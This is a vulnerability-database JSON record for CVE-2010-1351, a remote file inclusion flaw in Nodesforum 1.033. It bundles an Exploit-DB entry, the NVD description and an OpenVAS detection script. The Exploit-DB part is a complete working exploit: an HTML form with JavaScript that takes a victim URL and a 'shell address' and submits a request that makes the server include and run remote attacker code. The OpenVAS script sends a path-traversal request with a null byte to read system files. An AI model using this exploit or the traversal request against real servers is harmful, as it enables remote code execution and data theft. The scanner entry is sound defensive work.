{"hash": "87d3a1b7b4f09df269dd88572c190169543a95a3e28e172251c71bffcba0ace2", "id": "EDB-ID:12047", "lastseen": "2016-02-01T15:35:13", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/12047/", "description": "nodesforum v1.033 Remote File Inclusion Vulnerability. CVE-2010-1351. Webapps exploit for php platform", "title": "nodesforum 1.033 - Remote File Inclusion Vulnerability", "sourceData": "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\r\n<title>coded by ahmadbady</title>\r\n\r\n<script language=\"JavaScript\">\r\n\r\n//===========================================================================\r\n//( #Topic : nodesforum_1.033\r\n//( #Bug type : multi remote file include\r\n//( #Advisory : \r\n//===========================================================================\r\n//( #Author : ItSecTeam\r\n//( #Email : Bug@ITSecTeam.com\r\n//( #Website: http://www.itsecteam.com\r\n//( #Forum : http://forum.ITSecTeam.com\r\n//vuls---------------------------------------------------------------------\r\n//erase_user_data.php line 6;\r\n//pre_output.php line 16 ;\r\n//--------------------------------------------------------------------------\r\n\r\nvar variable1 =\"?_nodesforum_path_from_here_to_nodesforum_folder=\"\r\nvar variable2 =\"?_nodesforum_code_path=\"\r\n \r\n function it(){\r\n if (xpl.file.value==\"pre_output.php\"){\r\n variable1 = variable2;\r\n \r\n }\r\n xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.shell.value;xpl.submit(); \r\n }\r\n</script>\r\n\r\n</head>\r\n\r\n<body bgcolor=\"#FFFFFF\">\r\n\r\n<p align=\"left\"><font color=\"#FF0000\">vul1 file:/path/erase_user_data.php</font></p>\r\n<p align=\"left\"><font color=\"#FF0000\">vul2 file:/path/pre_output.php</font></p>\r\n<p align=\"left\"><font color=\"#0000FF\">-----------------------------------</font></p>\r\n<form method=\"post\" name=\"xpl\" onSubmit=\"it();\">\r\n <p align=\"left\">\r\n <font \r\nsize=\"2\" face=\"Tahoma\">\r\n \tvictim:\r\n \t<input type=\"text\" name=\"victim\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tpath:\r\n\t<input type=\"text\" name=\"path\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tfile:\r\n\t<input type=\"text\" name=\"file\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tshell address:\r\n\t<input type=\"text\" name=\"shell\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"></p>\r\n \t</p>\r\n<center>\r\n\r\n</p>\r\n <p><input type=\"submit\" value=\"GO\" name=\"B1\" style=\"float: left\"><input type=\"reset\" \r\nvalue=\"reset\" name=\"B2\" style=\"float: left\"></p>\r\n</form>\r\n<p><br>\r\n\u00c2\u00a0</p>\r\n</center>\r\n</body>\r\n\r\n</html>", "objectVersion": "1.0", "cvelist": ["CVE-2010-1351"], "published": "2010-04-04T00:00:00", "osvdbidlist": ["63555", "63554"], "references": [], "reporter": "ITSecTeam", "modified": "2010-04-04T00:00:00", "href": "https://www.exploit-db.com/exploits/12047/"}

{"cve": [{"lastseen": "2017-08-17T11:14:46", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/57517", "http://www.exploit-db.com/exploits/12047"], "description": "Multiple PHP remote file inclusion vulnerabilities in Nodesforum 1.033 and 1.045, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) _nodesforum_path_from_here_to_nodesforum_folder parameter to erase_user_data.php and the (2) _nodesforum_code_path parameter to pre_output.php. NOTE: some of these details are obtained from third party information.", "edition": 2, "reporter": "NVD", "published": "2010-04-12T14:30:00", "title": "CVE-2010-1351", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:14:46", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-1351"], "scanner": [], "modified": "2017-08-16T21:32:21", "cpe": ["cpe:/a:nodesforum:nodesforum:1.033", "cpe:/a:nodesforum:nodesforum:1.045"], "id": "CVE-2010-1351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1351", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-02T00:05:15", "references": ["http://secunia.com/advisories/39311", "http://xforce.iss.net/xforce/xfdb/57517", "http://www.exploit-db.com/exploits/12047"], "pluginID": "1361412562310902040", "description": "This host is running Nodesforum and is prone to multiple remote file\n inclusion vulnerabilities.", "edition": 4, "reporter": "Copyright (c) 2010 SecPod", "published": "2010-04-16T00:00:00", "title": "Nodesforum Multiple Remote File Inclusion Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1351"], "modified": "2017-10-26T00:00:00", "id": "OPENVAS:1361412562310902040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902040", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_nodesforum_mult_rfi_vuln.nasl 7577 2017-10-26 10:41:56Z cfischer $\n#\n# Nodesforum Multiple Remote File Inclusion Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902040\");\n script_version(\"$Revision: 7577 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 12:41:56 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 16:17:26 +0200 (Fri, 16 Apr 2010)\");\n script_cve_id(\"CVE-2010-1351\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Nodesforum Multiple Remote File Inclusion Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2010 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/39311\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/57517\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/12047\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary\n code in a user's browser session in the context of an affected site.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Nodesforum version 1.045 and prior.\");\n\n script_tag(name:\"insight\", value:\"Input passed to '_nodesforum_path_from_here_to_nodesforum_folder'\n parameter in 'erase_user_data.php' and to the '_nodesforum_code_path' parameter\n in 'pre_output.php' is not being validated before being used to include files.\");\n\n script_tag(name:\"solution\", value:\"No solution or patch was made available for at least one year\n since disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective\n features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running Nodesforum and is prone to multiple remote file\n inclusion vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/nodesforum\", \"/Nodesforum\", \"/\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/index.php\";\n\n res = http_get_cache( item:url, port:port );\n\n if( res =~ \"^HTTP/1\\.[01] 200\" && \"Nodesforum\" >< res ) {\n\n foreach file( keys( files ) ) {\n\n url = string(dir, \"/erase_user_data.php?_nodesforum_path_from_here_to_nodesforum_folder=../../../../../../../../\", files[file], \"%00\");\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}